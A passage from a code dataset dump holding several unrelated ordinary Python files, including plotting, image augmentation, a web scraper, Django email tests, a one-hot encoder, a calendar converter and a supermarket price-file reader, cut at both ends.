sys.argv[2] # output picture name\n\ndef plot_xvg(ifile, ofile):\n data = np.genfromtxt(ifile)\n\n fig = plt.figure(dpi=300)\n ax = fig.add_subplot(111)\n\n plt.plot(data[:,0], data[:,1])\n\n plt.xlabel(\"Time (ps)\", fontsize=15)\n plt.ylabel(\"Entropy (kJ/mol)\", fontsize=15)\n\n labels = [i.get_text() for i in ax.get_xticklabels()]\n b = [u'0', u'100', u'200', u'300', u'400', u'500', u'600']\n ax.set_xticklabels(b)\n\n # save figure in EPS\n plt.savefig(\"%s.pdf\" % ofile, dpi=300) # save eps for publication\n plt.savefig(\"%s.tif\" % ofile, dpi=300) # save tif for quick preview\n\nif __name__ == \"__main__\":\n plot_xvg(arg1, arg2)\n","sub_path":"plot_entropy.py","file_name":"plot_entropy.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"600330706","text":"import cv2\nimport numpy as np\n\ndef mask(img, num_img, op_type=\"random_bgr\", *param):\n new_imgs = globals()[\"_\"+op_type+\"_mask\"](img, num_img, *param)\n return new_imgs\n\ndef _random_bgr_mask(img, num_img, b_min_range=-10, b_max_range=10, g_min_range=-10, g_max_range=10, r_min_range=-10, r_max_range=10):\n result_imgs = []\n\n for _ in range(num_img):\n\n b_noise = np.random.randint(b_min_range, b_max_range+1, img.shape[:2])\n g_noise = np.random.randint(g_min_range, g_max_range+1, img.shape[:2])\n r_noise = np.random.randint(r_min_range, r_max_range+1, img.shape[:2])\n\n result_img = img + np.dstack((b_noise,g_noise,r_noise))\n result_imgs.append(result_img)\n\n return result_imgs\n\n","sub_path":"infer_core/rcnn_infer/rcnn/io/data_process/mask.py","file_name":"mask.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"72872423","text":"from pyramid.response import Response\nfrom pyramid.view import view_config\nfrom textwrap import dedent\n\n\n@view_config(route_name='home',\n renderer='json',\n request_method='GET')\ndef home_view(request):\n \"\"\"\n \"\"\"\n message = dedent('\\n'\n 'GET / - the base API route\\n'\n 'POST /api/v1/auth/ - Registering a new account\\n'\n 'GET /api/v1/portfolio/{id}/ - for retrieving a user\\'s portfolio\\n'\n 'POST /api/v1/stock/ - for creating a new company record\\n'\n 'GET /api/v1/stock/{id}/ - for retrieving a companies information\\n'\n 'DELETE /api/v1/stock/{id} - for deleting a company record\\n'\n 'GET /api/v1/company/{symbol} - '\n 'for retrieving company detail from 3rd party API, where {symbol} is variable')\n\n return Response(body=message, status=200)\n\n","sub_path":"stocks_api/views/default.py","file_name":"default.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"85061909","text":"from slimmer import html_slimmer\nimport sys\n\nbase = open(\"bootstrap_form.html\", \"r\")\nhtml = base.read();\nbase.close()\n\nuscf = open(\"email_templates/usc.html\", \"r\")\nusc = uscf.read();\nuscf.close()\n\n\nsivcf = open(\"email_templates/sivc.html\", \"r\")\nsivc = sivcf.read();\nsivcf.close()\n\n\nsivuf = open(\"email_templates/sivu.html\", \"r\")\nsivu = sivuf.read();\nsivuf.close()\n\n\notherf = open(\"email_templates/other.html\", \"r\")\nother = otherf.read();\notherf.close()\n\n\nhtml=html_slimmer( html.strip().replace('\\n',' ').replace('\\t',' ').replace('\\r',' ') )\n\nhtml = html.replace(\"###USC-TEMPLATE###\", usc);\nhtml = html.replace(\"###SIVC-TEMPLATE###\", sivc);\nhtml = html.replace(\"###SIVU-TEMPLATE###\", sivu);\nhtml = html.replace(\"###OTHER-TEMPLATE###\", other);\nhtml = html.replace(\"###EMAIL###\", \"ACTF@state.gov\");\nhtml = html.replace(\"###EMAIL-SUBJECT###\", \"Afghanistan Email\");\n\nout = open(\"email.min.html\",\"w\")\nout.write(html)\nout.close()\n","sub_path":"compile.py","file_name":"compile.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"392936646","text":"import os\nimport sys\n\nimageFolder = sys.argv[1] # first arg is path to image folder\n\nimgExts = [\"png\", \"bmp\", \"jpg\"]\n\nfor path, dirs, files in os.walk(imageFolder):\n for fileName in files:\n ext = fileName[-3:].lower()\n if ext not in imgExts:\n continue\n oldName = os.path.join(path, fileName)\n filePath = oldName.replace(os.path.sep, '_')\n newName = os.path.join(path, filePath[filePath.index('ward_') + 5:])\n os.rename(oldName, newName)\n \n\n\n","sub_path":"NeuralNet/addName.py","file_name":"addName.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"314021476","text":"#!/usr/bin/env python3\n\n# usage: python3 researchr_parse_colocated_events_from_ics.py --room SOAP --ics workshop-researchr-example.ics --json pldi-researchr-full.json\n\nimport argparse\nimport json\nimport re\n\nimport dateutil\nimport pytz\nimport requests\nimport unidecode\nfrom ics.icalendar import Calendar\n\n\ndef parse_arguments():\n parser = argparse.ArgumentParser(description=\"MiniConf Calendar Command Line\")\n\n parser.add_argument(\n \"--room\",\n default=\"SOAP\",\n type=str,\n help=\"Researchr room we're processing\",\n )\n\n parser.add_argument(\n \"--ics\",\n default=\"researchr.ics\",\n type=str,\n help=\"calendar entries from Researchr\",\n )\n\n parser.add_argument(\n \"--json\",\n default=\"researchr.json\",\n type=str,\n help=\"JSON file from Researchr\",\n )\n\n parser.add_argument(\"--out\", default=\"calendar.csv\", help=\"output file\")\n\n return parser.parse_args()\n\n\nresearchrToTrack = {\n \"SOAP\": \"soap\",\n \"PLDI Fake Track\": \"soap\",\n \"PLDI-A\": \"pldi-a\",\n \"PLDI-B\": \"pldi-b\",\n \"IMOP\": \"imop\",\n \"PLMW@PLDI\": \"plmw\",\n \"ARRAY\": \"array\",\n \"LCTES\": \"lctes\",\n \"HOPL IV\": \"hopl\",\n \"ISMM\": \"ismm\",\n \"PLanQC\": \"planqc\",\n \"Infer Practitioners\": \"infer\",\n \"MAPS\": \"maps\",\n \"PLDI Tutorials\": \"tutorials\",\n}\n\n\ndef makeISO(date, time):\n return date + \"T\" + time + \":00-04:00\"\n\n\ndef sessionTime(session):\n times = session[\"Time\"].split(\" - \")\n start = makeISO(session[\"Day\"], times[0])\n return start\n\n\ndef typeOfEvent(jsonData, key):\n return [x[\"Type\"] for x in jsonData[\"Items\"] if x[\"Key\"] == key][0]\n\n\ndef collectEventKeys(jsonData, room):\n sessions = [\n s\n for s in jsonData[\"Sessions\"]\n if (s[\"Location\"].split(\"Online | \")[1] == room and \"Items\" in s)\n ]\n sortedEvents = list(sorted(sessions, key=sessionTime))\n events = [e for s in sortedEvents for e in s[\"Items\"]]\n return events\n\n\ndef chairsForEvent(jsonData, key):\n for s in jsonData[\"Sessions\"]:\n if key in s.get(\"Items\", []):\n return s.get(\"ChairsString\", \"\")\n return \"\"\n\n\ndef convert(args):\n\n file_ics: str = args.ics\n if not file_ics.startswith(\"http\"):\n with open(file_ics, \"r\") as f:\n c = Calendar(f.read())\n else:\n c = Calendar(requests.get(file_ics).text)\n\n file_json: str = args.json\n with open(file_json, \"r\") as f:\n jsonData = json.load(f)\n\n types = [\n (typeOfEvent(jsonData, x), chairsForEvent(jsonData, x))\n for x in collectEventKeys(jsonData, args.room)\n ]\n\n regex = \"\\[([^\\\\]]*)\\] (.*)\"\n pattern = re.compile(regex)\n\n eastern = pytz.timezone(\"US/Eastern\")\n\n with (open(args.out, \"w\")) as f:\n f.write(\"event,date,start,end,title,authors,notes,session chairs\\n\")\n roomEvents = [\n x\n for x in c.events\n if x.location.split(\" - \")[0].strip() == args.room\n and x.name.startswith(\"[\")\n ]\n sortedEvents = list(sorted(roomEvents, key=lambda c: c.begin))\n assert len(types) == len(sortedEvents)\n for e, (t, chairs) in zip(sortedEvents, types):\n parts = e.name.rsplit(\" - \", 1)\n title = parts[0]\n m = pattern.match(title)\n event = researchrToTrack[m.group(1).strip()]\n title = m.group(2)\n if len(parts) > 1:\n authors = parts[1].split(\", \")\n else:\n authors = \"\"\n\n authors = \", \".join(authors)\n authors = unidecode.unidecode(authors)\n\n if chairs != \"\":\n chairs = f',\"{chairs}\"'\n\n if t != \"Social Event\":\n extra = \"\"\n if t == \"Live Q&A\":\n extra = \"Discussion or post-talk Q&A in Zoom\"\n\n f.write(\n f'{event},{e.begin.astimezone(None).strftime(\"%Y-%m-%d\")},{e.begin.astimezone(None).strftime(\"%H:%M\")},{e.end.astimezone(None).strftime(\"%H:%M\")},\"{title}\",\"{authors}\",\"{extra}\"{chairs}\\n'\n )\n\n\nif __name__ == \"__main__\":\n args = parse_arguments()\n convert(args)\n","sub_path":"scripts/researchr_parse_colocated_events_from_ics_for_slideslive.py","file_name":"researchr_parse_colocated_events_from_ics_for_slideslive.py","file_ext":"py","file_size_in_byte":4144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"209202284","text":"from django.test import TestCase, override_settings\nfrom django.contrib.auth.models import User\nfrom django.core import mail\nfrom unittest.mock import patch, Mock, MagicMock\nfrom django.template.backends.django import Template\nfrom django.conf import settings\nfrom html2text import html2text\nfrom requests.models import Response\n\nfrom app.models import Goal, Email\n\nfrom app import utils\n\n\nclass UtilsTest(TestCase):\n def setUp(self):\n self.user = User.objects.create(email='user@real.com')\n\n @patch('app.utils.email_signal')\n @patch('app.utils.loader')\n @patch('django.core.mail.utils.socket')\n @override_settings(EMAIL_META={'test': {'subject': 'Test Subject'}})\n def test_send_email(self, socket, loader, email_signal):\n socket.getfqdn = Mock(return_value='test')\n\n goal = Mock(spec=Goal)\n\n body = 'some email body'\n\n template = Mock(spec=Template)\n template.render.return_value = body\n loader.get_template = Mock(return_value=template)\n\n utils.send_email('test', self.user, goal)\n\n loader.get_template.assert_called_once_with('emails/test.html')\n template.render.assert_called_once_with({\n 'user': self.user,\n 'goal': goal,\n 'BASE_URL': settings.BASE_URL,\n 'TWITTER_URL': settings.TWITTER_URL,\n 'FACEBOOK_URL': settings.FACEBOOK_URL,\n 'TRACKING': False,\n })\n\n self.assertEquals(1, len(mail.outbox))\n message = mail.outbox[0]\n\n self.assertEquals(message.subject, 'Test Subject')\n self.assertEquals(message.from_email,\n 'Bec and Chris ')\n self.assertEquals(message.to, [self.user.email])\n\n self.assertEquals(message.body, html2text(body))\n self.assertEquals(message.alternatives[0], (body, 'text/html'))\n\n self.assertEquals(message.extra_headers, {\n 'category': 'test'\n })\n\n emails = Email.objects.filter(recipient=self.user)\n self.assertEquals(emails.count(), 1)\n email = emails.first()\n self.assertEquals(email.name, 'test')\n\n email_signal.send.assert_called_with('app.utils.send_email',\n email=email)\n\n def test_send_email_raises_on_inactive_user(self):\n user = MagicMock(spec=User)\n user.is_active = False\n user.email = 'test'\n\n with self.assertRaises(ValueError):\n utils.send_email('test', user)\n\n @override_settings(DEBUG=False)\n @patch('app.utils.keen')\n def test_add_event_debug(self, keen):\n utils.add_event('test', self.user, {'foo': 'bar'})\n\n self.assertFalse(keen.add_event.called)\n","sub_path":"app/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":2721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"174093367","text":"#! /path/to/ENV/bin/python\nimport scrapy\nfrom article_spider import ArticleSpider\nimport news_scraper.newsscraper_service as service\n\nclass NewsFeedSpider(scrapy.Spider):\n name = 'news'\n page_number = 1\n article_scraper = ArticleSpider()\n\n start_urls = ['http://gvardeysk.gov39.ru/news/']\n\n def parse(self, response):\n service.initialize() \n for newsElement in response.xpath(\"//*[@id = 'news_list']/table\"):\n text = newsElement.xpath(\".//span[@class='news-preview-text']/div//text()\").extract_first()\n\n if text is None:\n continue\n \n words = service.cleanText(text).split()\n \n articlePageLink = newsElement.xpath(\".//a[starts-with(@href,'/news/detail.php?ELEMENT_ID')]\").extract_first() \n \n yield {\n 'day': newsElement.xpath(\".//font[@class='day']//text()\").extract_first(),\n 'month': service.parseMonth(newsElement.xpath(\".//font[@class='month']//text()\").extract_first().lower(), 'rus1'),\n 'title': newsElement.xpath(\".//a[@class='news_header']//text()\").extract_first(),\n 'text': newsElement.xpath(\".//span[@class='news-preview-text']/div//text()\").extract_first(),\n }\n\n link_to_article = newsElement.xpath(\".//a[@class='news_header']/@href\").extract_first()\n\n if link_to_article is not None:\n print(\"FOLLOW \" + link_to_article)\n yield response.follow(link_to_article, self.article_scraper.parse)\n else:\n print(\"NO ARTICLE LINK FOUND FOR \" + link_to_article)\n\n self.page_number += 1 \n next_page = response.xpath(\"//a[@href = '/news/?PAGEN_1=\" + str(self.page_number) + \"']/@href\").extract_first()\n\n if next_page is not None:\n pass\n #yield response.follow(next_page, self.parse)\n else:\n print (\"finished on page \" + str(self.page_number - 1))\n","sub_path":"spiders/newsscraper.py","file_name":"newsscraper.py","file_ext":"py","file_size_in_byte":1803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"618684819","text":"#!/usr/bin/env python\n\n\"\"\"\nSnippet markdown filter\n========================\n\n- Copyright (c) 2018 Matt Soucy\n\n## Format\n\n```\n{{< tagname \"data\" >}}\n```\n\"\"\"\n\nimport markdown\n\n\nclass SnippetExtension(markdown.Extension):\n \"\"\" Snippet Extension for Python-Markdown. \"\"\"\n\n def __init__(self, configs):\n \"\"\"\n Create an instance of the Snippet extension\n\n Keyword arguments:\n * configs: A dict of configuration settings passed in by the user.\n \"\"\"\n # Set extension defaults\n self.config = {\n 'handlers': [{}, 'Handler callbacks']\n }\n # Override defaults with user settings\n self.setConfigs(configs)\n\n def add_inline(self, md, name, pattern_class, pattern):\n \"\"\"\n Add new functionality to the Markdown instance.\n\n Keyword arguments:\n * md: The Markdown instance.\n * md_globals: markdown's global variables.\n \"\"\"\n objPattern = pattern_class(pattern, self.config)\n objPattern.md = md\n objPattern.ext = self\n md.inlinePatterns.add(name, objPattern, \"\\}\\}'\n fullRe = prefix + tag + space + text + suffix\n self.add_inline(md, \"mastodon\", BasicSnippetPattern, fullRe)\n\n\nclass BasicSnippetPattern(markdown.inlinepatterns.Pattern):\n def __init__(self, pattern, config):\n self.pattern = pattern\n self.config = config\n super(BasicSnippetPattern, self).__init__(pattern)\n\n def handleMatch(self, match):\n\n if match:\n # Group 1 is \"everything before this\"\n tag = str(match.group(2))\n # Remove the quotes\n text = str(match.group(3))[1:-1]\n\n handlerList = self.config['handlers'][0]\n func = handlerList.get(tag, lambda id: id)\n\n return func(text)\n else:\n return \"\"\n\n\ndef makeExtension(*args, **kwargs):\n return SnippetExtension(*args, **kwargs)\n\n\nif __name__ == \"__main__\":\n import doctest\n print(doctest.testmod())\n print(\"-\" * 8)\n md = markdown.Markdown(extensions=['snippet'])\n print(md.convert(__doc__))\n\n","sub_path":"mdx_snippets.py","file_name":"mdx_snippets.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"52140850","text":"import db_mac\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom matplotlib.ticker import (MultipleLocator)\n\nsql = \"\"\"select \nsqrt(power((ST_X(d.geom) - 382983),2) + power((ST_Y(d.geom) - 5824610),2)) as distance, d.speed*0.514444\n from dump d , bufferzone b\n where\n st_within(d.geom, b.geom)\n and d.vert_rate > 0 ---start\n --and d.vert_rate <= 0 -- land\n and d.track > 70 and d.track < 90 -- start\n --and d.track > 250 and d.track < 270 -- land\n and b.name like 'TXL'\nand d.speed <= 300\nand sqrt(power((ST_X(d.geom) - 382983),2) + power((ST_Y(d.geom) - 5824610),2)) <= 11000\n\n \"\"\"\n\ndata = np.array(list(db_mac.execute(sql))).T\ndistance = [round(i) for i in data[0, :]]\nspeed = [round(i) for i in data[1, :]]\n\nfig, ax = plt.subplots(figsize=(10, 4))\nax.grid(True)\nax.set_title('Fluggeschwindigkeiten im Geofence mit postiver Vertikalrate')\nax.margins(0)\n# ax.axvline(x=4191,color='red')\nax.set_xlim(0, 11000)\nax.yaxis.set_major_locator(MultipleLocator(10))\nax.xaxis.set_major_locator(MultipleLocator(1000))\nax.set(ylabel=\"Geschwindigkeit in Meter/Sekunde\")\nax.set(xlabel=\"Distanz zum Zentroid (E:382983 N:5824610 (UTM-33N WGS84) in Meter\")\nax.scatter(distance, speed, 0.01)\nplt.tight_layout()\nplt.show()\n","sub_path":"plots/plot_speed_start.py","file_name":"plot_speed_start.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"369272997","text":"# -*- coding: utf-8 -*-\n\n#############################################################################\n# #\n# EIDEAnalog practising section #\n# File: EA_7000_EXERCISEb.py #\n# #\n# Archivo: EA_7000_EXERCISEb.py #\n# Librería EIDEAnalog (ejercicios de autoevaluación). #\n# Consulte punto 7.- Tablas de sensores (sensorTable) #\n# en EIDEAnalog_ASI_SE_HIZO.pdf (https://github.com/Clave-EIDEAnalog/DOCS) #\n# #\n# Copyright (c) 2020. Clave Ingenieros S.L.; #\n# vicente.fombellida@claveingenieros.es #\n# #\n#############################################################################\nimport os\n\nclass sensorTable():\n \"\"\" Class for sensor tables \"\"\"\n head = os.getcwd()\n tables = os.path.join(head, 'SENSOR_TABLES')\n\n def __init__(self, archivo):\n\n self.name = archivo.split(\".\")[0]\n self.table = []\n self.archivoPath = os.path.join(sensorTable.tables, self.name + '.txt')\n self.read(self.archivoPath)\n \n self.mapLen = len(self.table)\n self.mapMinimum = self.table[0][0]\n self.mapMaximum = self.table[len(self.table) - 1][0]\n self.sort()\n self.verify()\n\n self.position = -1\n\n def read(self, file):\n fichero = open(self.archivoPath, \"r+\")\n for linea in fichero:\n pointsList = (float(linea.split(\",\")[0]),\n float(linea.split(\",\")[1]))\n self.table.append(pointsList)\n fichero.close()\n\n def sort(self):\n self.table.sort()\n\n def verify(self):\n if self.mapLen < 4:\n raise EIDEError(\"\", \"Sensor table error: less than three points\")\n for counter, i in enumerate(self.table):\n if counter == self.mapLen - 1:\n # Table top reached.\n return\n if i[0] == self.table[counter+1][0]:\n raise EIDEError(\"\", \"Sensor table error: double abcissa\")\n\n def lookup(self, abcissa):\n \"\"\" Return ordinate for abcissa \"\"\"\n return self.linearInterpolate(self.abcissaPoints(\n self.pointer(abcissa)), abcissa)\n \n def pointer(self, abcissa):\n \"\"\" Return position of equal or first smaller number \"\"\" \n if abcissa < self.table[0][0]:\n # abcissa 'below' table.\n return 0\n for contador,i in enumerate(self.table):\n if i[0] > abcissa:\n return contador - 1\n return contador\n \n def abcissaPoints(self, pointer): \n \"\"\" Return a list holding interpolation points \"\"\"\n if pointer >= (self.mapLen - 1):\n # Point 'above' table.\n return (self.table[self.mapLen - 2],\n self.table[self.mapLen - 1])\n return (self.table[pointer],\n self.table[pointer + 1])\n \n def linearInterpolate(self, points, abcissa):\n \"\"\" Return a list holding interpolation points \"\"\"\n x1 = points[0][0]\n y1 = points[0][1]\n x2 = points[1][0]\n y2 = points[1][1]\n m = (y2-y1)/(x2-x1)\n b = y2 - (x2/(x2-x1))*(y2-y1)\n return (m * abcissa + b)\n\ntable = sensorTable('VAPOUR_PRESSURE')\nvalues = [36.0, 62.5]\nfor i in values:\n print ('For', i, \"table gives\", table.lookup(i))\n","sub_path":"EA_7000_EXERCISEb.py","file_name":"EA_7000_EXERCISEb.py","file_ext":"py","file_size_in_byte":3766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"450767033","text":"import datetime\nimport os\n\nimport pandas as pd\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtCore import pyqtSlot\n\nfrom xl_backend import Backend\nfrom GUI.dialog_revert import Ui_Revert_Dialog_Base\n\n\nclass DialogRevert(Ui_Revert_Dialog_Base):\n\n def __init__(self, Dialog, db):\n self.db = db\n self.revert_to_log = '' # Which database to roll back\n self.revert_to_file = '' # Which backup file to roll to\n self.setupUi(Dialog)\n\n def setupUi(self, Dialog):\n super().setupUi(Dialog)\n for log_name in Backend.excel_format.keys():\n self.revert_log.addItem(str(log_name))\n self.log_type_selected(self.revert_log.currentText())\n\n # TODO: Plumb slider and spin box to revert_files slots\n self.revert_log.currentTextChanged.connect(self.log_type_selected)\n self.revert_files.cellDoubleClicked.connect(self.file_selected)\n\n @pyqtSlot(str)\n def log_type_selected(self, log_val):\n self.revert_step_slider.setEnabled(True)\n self.revert_steps_spin.setEnabled(True)\n self.populate_file_table(log_val)\n\n def populate_file_table(self, log_val):\n if 'workout' in log_val.lower():\n bak_files = self.db.get_wl_temp_files()\n elif 'weight' in log_val.lower():\n bak_files = self.db.get_bw_temp_files()\n elif 'lift' in log_val.lower():\n bak_files = self.db.get_lt_temp_files()\n else:\n bak_files = None\n\n if bak_files:\n n_backups = len(bak_files)\n max_steps_back = -1 * n_backups\n self.revert_step_slider.setMinimum(max_steps_back)\n self.revert_steps_spin.setMinimum(max_steps_back)\n self.revert_steps_spin.setMaximum(max(-1, max_steps_back))\n self.revert_step_slider.setMaximum(max(-1, max_steps_back))\n\n self.revert_files.clearContents()\n self.revert_files.setRowCount(len(bak_files))\n for row, bak_file in enumerate(reversed(bak_files)):\n if os.path.isfile(bak_file):\n\n last_modified = datetime.datetime.fromtimestamp(os.path.getmtime(bak_file))\n cell1 = QtWidgets.QTableWidgetItem()\n cell1.setText(str(last_modified))\n self.revert_files.setItem(row, 0, cell1)\n\n cell2 = QtWidgets.QTableWidgetItem()\n cell2.setText(bak_file)\n self.revert_files.setItem(row, 1, cell2)\n self.revert_files.selectRow(0)\n\n @pyqtSlot(int)\n def file_selected(self, file_row):\n filename = self.revert_files.item(file_row, 1).text()\n if not filename or not os.path.isfile(filename):\n return\n self.revert_preview.setEnabled(True)\n self.revert_preview.clearContents()\n # TODO: once refactoring of accessory calls in xl_backend is complete, use Backend.import__\n file_preview = pd.read_excel(filename)\n\n # Setup Header\n cols = file_preview.keys()\n n_cols = len(cols)\n self.revert_preview.setColumnCount(n_cols)\n self.revert_preview.setHorizontalHeaderLabels(cols)\n\n # Populate table\n n_rows = len(file_preview)\n self.revert_preview.setRowCount(n_rows)\n\n curr_row = 0\n for row_idx, row in file_preview.iterrows():\n col_idx = 0\n for col_name, cell_val in row.iteritems():\n cell = QtWidgets.QTableWidgetItem()\n cell.setText(str(cell_val))\n self.revert_preview.setItem(curr_row, col_idx, cell)\n col_idx += 1\n curr_row += 1\n\n self.revert_to_log = self.revert_log.currentText()\n self.revert_to_file = filename\n","sub_path":"GUI/DialogRevert.py","file_name":"DialogRevert.py","file_ext":"py","file_size_in_byte":3760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"96742425","text":"\"\"\" 11. Container With Most Water\nhttps://leetcode.com/problems/container-with-most-water/\n\nGiven n non-negative integers a1, a2, ..., an , where each represents a point at coordinate (i, ai). n vertical lines are drawn such that the two endpoints of line i is at (i, ai) and (i, 0). Find two lines, which together with x-axis forms a container, such that the container contains the most water.\n\nNote: You may not slant the container and n is at least 2.\n\nThe above vertical lines are represented by array [1,8,6,2,5,4,8,3,7]. In this case, the max area of water (blue section) the container can contain is 49.\n\n\n\"\"\"\n# attempt 1 - too long - timepout => O(N^2)\nclass Solution:\n def maxArea(self, height: List[int]) -> int:\n max_vol = 0\n for i in range(len(height) - 1):\n for j in range(i + max_vol // height[i], len(height)):\n max_vol = max(max_vol, (j - i) * min(height[i], height[j]))\n return max_vol\n\n# attempt 2:\n# looked into the solution\n\nclass Solution:\n def maxArea(self, height: List[int]) -> int:\n max_vol = 0\n i = 0\n j = len(height) - 1\n while i < j:\n # print(\"i: {}; j: {}\".format(i, j))\n vol = (j - i) * min(height[i], height[j])\n # print(\"vol: {}\".format(vol))\n max_vol = max(max_vol, vol)\n # print(\"max_vol: {}\".format(max_vol))\n if height[i] <= height[j]:\n i += 1\n else:\n j -= 1\n return max_vol\n\n\n\"\"\"\nRuntime: 140 ms, faster than 29.22% of Python3 online submissions for Container With Most Water.\nMemory Usage: 14.2 MB, less than 95.79% of Python3 online submissions for Container With Most Water.\n\"\"\"","sub_path":"algorithms/00/11-20/0011_container_with_most_water/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"53550413","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.externals import six\n\n\nclass One_Hot_Convertor(BaseEstimator, TransformerMixin):\n def __init__(self, dtype=np.float64, separator=\"=\", replace = True, sparse=True,\n sort=True, drop_one=True):\n self.dtype = dtype\n self.separator = separator\n self.sparse = sparse\n self.sort = sort\n self.drop_one = drop_one\n self.replace = replace\n\n def fit(self, df, y=None):\n \"\"\"Learn a list of feature name -> indices mappings.\n Parameters\n ----------\n df : DataFrame\n y : (ignored)\n Returns\n -------\n self\n \"\"\"\n feature_names = []\n vocab = {}\n default_features = []\n all_features_mult_dict = {col : 1 for col in df.columns}\n\n\n for col in df:\n feature_added = False\n features_created_in_this_col = []\n mult = 0\n\n for index in df.index:\n val = df.loc[index, col]\n\n if isinstance(val, six.string_types):\n feature = \"%s%s%s\" % (col, self.separator, val)\n if feature not in vocab:\n vocab[feature] = len(vocab)\n feature_names.append(feature)\n features_created_in_this_col.append(feature)\n mult += 1\n feature_added = True\n\n if feature_added and len(feature_names) > 1 and self.drop_one:\n default = feature_names.pop()\n features_created_in_this_col.pop()\n del(vocab[default])\n default_features.append(default)\n\n if feature_added:\n # print('col = ', col)\n del (all_features_mult_dict[col])\n for f in features_created_in_this_col:\n all_features_mult_dict[f] = mult\n\n self.feature_names_ = feature_names\n self.vocabulary_ = vocab\n self.default_features_ = default_features\n\n self.all_features_mult_dict_ = all_features_mult_dict\n\n return self\n\n\n\n def transform(self, df, y=None):\n\n # get parameters from the Object.fit() operation\n feature_names = self.feature_names_\n vocab = self.vocabulary_\n default_features = self.default_features_\n all_features_mult_dict = self.all_features_mult_dict_\n\n # print(feature_names)\n df_cp = df.copy() # make a copy\n for feature in feature_names:\n df_cp[feature] = 0\n\n\n for col in df:\n col_expanded = False\n for index in df.index:\n val = df.loc[index, col]\n if isinstance(val, six.string_types):\n feature = \"%s%s%s\" % (col, self.separator, val)\n if feature in vocab:\n df_cp.loc[index, feature] = 1\n col_expanded = True\n if col_expanded and self.replace:\n df_cp = df_cp.drop(col, axis = 1)\n\n return df_cp\n\n\n\n\nif __name__ == '__main__':\n data = {'col1_str': ['A', 'B', 'A', 'B', 'B', 'C', 'D'],\n 'col2_int': [100, 101, 102, 102, 101, 100, 100],\n 'col3_float': [1.1, 1.1, 5.2, 2.3, 2.5, 2.0, 1.1]}\n\n\n df = pd.DataFrame(data)\n print(df)\n #df.col2_int = df.col2_int.astype(str)\n\n ohc = One_Hot_Convertor() # set replace=Flse if you want to see the original column\n ohc.fit(df)\n # print('fm', ohc.feature_names_)\n # print('voc', ohc.vocabulary_)\n # print('def', ohc.default_features_)\n # print('mult', ohc.all_features_mult_dict_)\n\n df2 = ohc.transform(df)\n print(df2)\n # print(df2.mean())","sub_path":"kaggle/ames_housing/2017-10-01/functions/One_Hot_Convertor.py","file_name":"One_Hot_Convertor.py","file_ext":"py","file_size_in_byte":3307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"137538824","text":"##############################################################################\n# This file contains sevral functions reguarding the exercise of basket comperation.\n# It contains 12 functions that are listed in the exercise\n# with two extra function for logic breaking of a lage function\n# #(this functions are max_value,contains_word).\n\n##############################################################################\n\nimport xml.etree.ElementTree as ET\nimport re\n\nITEM_NAME_TAG = 'ItemName'\nITEM_CODE_TAG = 'ItemCode'\nITEM_PRICE_TAG = 'ItemPrice'\nSTORE_ID = 'StoreId'\nITEMS_TAG = 'Items'\nITEM_TAG = 'Item'\nPUNISHMENT = 1.25\n\ndef read_prices_file(filename):\n '''\n\n Read a file of item prices into a dictionary. The file is assumed to\n be in the standard XML format of \"misrad haclcala\".\n Returns a tuple: store_id and a store_db, \n where the first variable is the store name\n and the second is a dictionary describing the store. \n The keys in this db will be ItemCodes of the different items and the\n values smaller dictionaries mapping attribute names to their values.\n Important attributes include 'ItemCode', 'ItemName', and 'ItemPrice'\n '''\n\n document = ET.parse(filename)\n root = document.getroot()\n store_db = {}\n ID = root.find(STORE_ID)\n the_StoreID = ID.text\n\n Items = root.find(ITEMS_TAG)\n\n if Items != None:\n for item in Items.findall(ITEM_TAG):\n\n itemcode = item.find(ITEM_CODE_TAG)\n if itemcode != None:\n store_db[itemcode.text] = {}\n for element in item.findall('*'):\n store_db[itemcode.text][element.tag] = element.text\n\n return the_StoreID, store_db\n\n\ndef contains_word(text, word):\n \"\"\"this func receives a text and a letter and returns True\n if the word is in the text\"\"\"\n #for filter_store\n return (' ' + word + ' ') in (' ' + text + ' ')\n\n\ndef filter_store(store_db, filter_txt):\n '''\n Create a new dictionary that includes only the items \n that were filtered by user.\n I.e. items that text given by the user is part of their ItemName. \n Args:\n store_db: a dictionary of dictionaries as created in read_prices_file.\n filter_txt: the filter text as given by the user.\n '''\n\n store_db_new = {}\n dictionary = store_db\n\n for key in dictionary:\n if contains_word(dictionary[key][ITEM_NAME_TAG], filter_txt) is True:\n store_db_new[key] = dictionary[key]\n return store_db_new\n\n\ndef sum_basket(price_list):\n '''\n Receives a list of prices\n Returns a tuple - the sum of the list (when ignoring Nones) \n and the 